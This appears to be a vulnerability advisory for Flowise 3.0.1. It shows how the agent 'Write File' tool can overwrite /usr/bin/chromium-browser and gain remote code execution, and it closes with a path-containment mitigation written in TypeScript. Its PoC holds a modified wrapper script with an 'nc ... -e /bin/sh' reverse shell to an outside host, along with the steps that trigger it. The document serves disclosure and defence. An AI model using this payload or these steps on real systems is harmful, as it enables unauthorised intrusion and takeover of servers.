Summary
An authenticated attacker can use the agent writeFile tool to overwrite existing files on the filesystem, leading to Remote Code Execution (RCE).
Details
A critical vulnerability exists in the on-premise deployment of Flowise 3.0.1 involving the writeFile functionality. Attackers can exploit it to overwrite or modify any file on the filesystem, for example by injecting malicious code into the chromium-browser wrapper script at /usr/bin/chromium-browser, which is used by the "Puppeteer Web Scraper" document loader.
PoC
To reproduce the vulnerability, you need to create a new agent.
Inside the agent add a “Write File” tool

Target the /usr/bin/chromium-browser file for overwriting:
file_path: /usr/bin/chromium-browser
text:
#!/bin/sh
for f in /etc/chromium/*.conf; do [ -f "$f" ] && . "$f"; done; CHROMIUM_FLAGS="$CHROMIUM_FLAGS ${CHROMIUM_USER_FLAGS:+"$CHROMIUM_USER_FLAGS"}"; export CHROME_WRAPPER="$(readlink -f "$0")"; PROGDIR=${CHROME_WRAPPER%/*}; case ":$PATH:" in *:$PROGDIR:*) ;; *) export PATH="$PATH:$PROGDIR" ;; esac; [ $(id -u) -eq 0 ] && [ $(stat -c %u -L ${XDG_CONFIG_HOME:-${HOME}}) -eq 0 ] && CHROMIUM_FLAGS="--user-data-dir=${XDG_CONFIG_HOME:-"$HOME"/.config}/chromium $CHROMIUM_FLAGS"; export CHROME_DESKTOP="chromium.desktop" CHROME_VERSION_EXTRA="Alpine Linux"; nc revshell.evasecresearch.com 1337 -e /bin/sh > /dev/null; exec "$PROGDIR/chromium" ${CHROMIUM_FLAGS} "$@"

Starting the flow will write the new content to the file on the filesystem.

Success

The new file content contains the reverse shell.

To trigger execution of /usr/bin/chromium-browser and load the reverse shell (code execution), add a new "Document Store".

Inside it, add a new "Document Loader" and choose the "Puppeteer Web Scraper".


Fill in any URL in the form and select "Preview Chunks"; this triggers execution of the /usr/bin/chromium-browser shell script.

A reverse shell is popped, giving remote code execution.

Dockerfile for reference

Impact
This is a critical Remote Code Execution (RCE) vulnerability. It allows an authenticated (or potentially unauthenticated, when combined with a separate bypass) attacker to execute arbitrary code on the affected system. Specifically, it leverages the ability to write arbitrary files to overwrite critical system components, such as /usr/bin/chromium-browser, and insert malicious code.
Users of the on-premise deployment of Flowise 3.0.1 (latest) are impacted. This vulnerability affects systems running this specific version and deployment model. Organizations or individuals using Flowise 3.0.1 on their own servers are at risk.
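The root cause above is a write tool that accepts any file_path. The following is an added example, not Flowise's own code, of the containment check such a tool should apply before writing: it confines writes to an assumed workspace root, rejects absolute paths and traversal, and refuses to cross a symlink that could point back out to a location like /usr/bin.

```typescript
// Added example (not Flowise's code): confine a "Write File" tool to a
// workspace root. The root directory is an assumption of this example.
import * as fs from "node:fs";
import * as path from "node:path";

export interface WriteDecision {
  allowed: boolean;
  resolved: string;   // absolute path the write would land on
  reason?: string;
}

// True when `candidate` is `root` itself or lies strictly beneath it.
function isInside(root: string, candidate: string): boolean {
  const rel = path.relative(root, candidate);
  return rel === "" || (!path.isAbsolute(rel) && rel !== ".." && !rel.startsWith(".." + path.sep));
}

function lstatOrNull(p: string): fs.Stats | null {
  try { return fs.lstatSync(p); } catch { return null; }
}

// Walks the existing part of the path below `root` and refuses to cross a
// symlink, so `workspace/bin -> /usr/bin` cannot reach /usr/bin/chromium-browser.
function crossesSymlink(root: string, candidate: string): boolean {
  let cur = root;
  for (const seg of path.relative(root, candidate).split(path.sep).filter(Boolean)) {
    cur = path.join(cur, seg);
    const st = lstatOrNull(cur);
    if (!st) return false;               // remainder does not exist yet
    if (st.isSymbolicLink()) return true;
  }
  return false;
}

export function checkWritePath(workspaceRoot: string, requested: string): WriteDecision {
  const root = path.resolve(workspaceRoot);
  if (requested.includes("\0")) return { allowed: false, resolved: "", reason: "NUL byte in path" };
  if (path.isAbsolute(requested)) return { allowed: false, resolved: path.resolve(requested), reason: "absolute paths are not accepted" };
  const resolved = path.resolve(root, requested);
  if (!isInside(root, resolved)) return { allowed: false, resolved, reason: "path escapes the workspace" };
  if (crossesSymlink(root, resolved)) return { allowed: false, resolved, reason: "path crosses a symlink" };
  return { allowed: true, resolved };
}

// Write only after the check passes; the caller sees the reason on refusal.
export function guardedWriteFile(workspaceRoot: string, requested: string, text: string): string {
  const d = checkWritePath(workspaceRoot, requested);
  if (!d.allowed) throw new Error(`writeFile refused ${JSON.stringify(requested)}: ${d.reason}`);
  fs.mkdirSync(path.dirname(d.resolved), { recursive: true });
  fs.writeFileSync(d.resolved, text, { flag: "w" });
  return d.resolved;
}
```

A check like this narrows the tool to its intended purpose; in deployments where the tool is not needed at all, disabling it is the simpler control.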